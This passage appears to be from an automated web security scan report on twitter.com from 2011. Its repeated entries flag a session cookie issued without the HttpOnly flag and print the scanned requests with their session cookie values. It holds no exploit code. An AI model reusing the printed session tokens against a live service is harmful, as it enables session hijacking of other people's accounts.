Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.79. http://twitter.com/backstreetboys previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/backstreetboys

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /backstreetboys HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.80. http://twitter.com/benmezrich previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/benmezrich

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /benmezrich HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.81. http://twitter.com/bennadel previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/bennadel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIiBodHRwOi8vdHdpdHRlci5jb20vYmVubmFkZWw6%250ADGNzcmZfaWQiJTEyNDM3NmU5Zjg3ODYwNmJiMWM2YjQ0MzhhNmM0NTM5Og9j%250AcmVhdGVkX2F0bCsIM07wzC0BOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRh%250AZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNo%250AOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--d2adbee25df14d0172349a6c3fd5e58e45975083; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bennadel HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.82. http://twitter.com/bostonherald previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/bostonherald

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bostonherald HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.83. http://twitter.com/business previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/business

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 301 Moved Permanently
Date: Fri, 28 Jan 2011 14:31:19 GMT
Server: hi
Status: 301 Moved Permanently
X-Transaction: 1296225079-95247-27498
Last-Modified: Fri, 28 Jan 2011 14:31:19 GMT
Location: http://business.twitter.com/
X-Runtime: 0.01339
Content-Type: text/html; charset=utf-8
Content-Length: 94
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<html><body>You are being <a href="http://business.twitter.com/">redirected</a>.</body></html>

11.84. http://twitter.com/cjronson previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/cjronson

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cjronson HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.85. http://twitter.com/cowboy previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/cowboy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cowboy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.86. http://twitter.com/creationix previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/creationix

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /creationix HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.87. http://twitter.com/dandenney previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/dandenney

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dandenney HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.88. http://twitter.com/danwrong previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/danwrong

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /danwrong HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.89. http://twitter.com/davevogler previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/davevogler

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /davevogler HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.90. http://twitter.com/deionbranch84 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/deionbranch84

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /deionbranch84 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.91. http://twitter.com/dougneiner previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/dougneiner

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dougneiner HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.92. http://twitter.com/ebello previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/ebello

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ebello HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.93. http://twitter.com/ericmmartin previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/ericmmartin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIiNodHRwOi8vdHdpdHRlci5jb20vZXJpY21tYXJ0%250AaW46DGNzcmZfaWQiJTgyOTI5MWZkOGU2YmQxN2QxYTRkYzlmMDFlZjViZDVk%250AOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNo%250ASUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1%250Ac2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE%253D--aec68d2fd0935035e3877d8879d09c5b64c00398; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ericmmartin HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.94. http://twitter.com/ericmmartin/status/30128016856195073 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/ericmmartin/status/30128016856195073

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20vZXJpY21tYXJ0%250AaW4vc3RhdHVzLzMwMTI4MDE2ODU2MTk1MDczOgxjc3JmX2lkIiVmMzE1MDNl%250AMzcxMDU0OWE3YjU2YTE5Zjk1OGRkMDBmMToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI%250AM07wzC0B--f20b609817e7de3826da0bcc06ca803fab8dec0f; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.95. http://twitter.com/favorites/14594657.rss previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/favorites/14594657.rss

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favorites/14594657.rss HTTP/1.1
Host: twitter.com
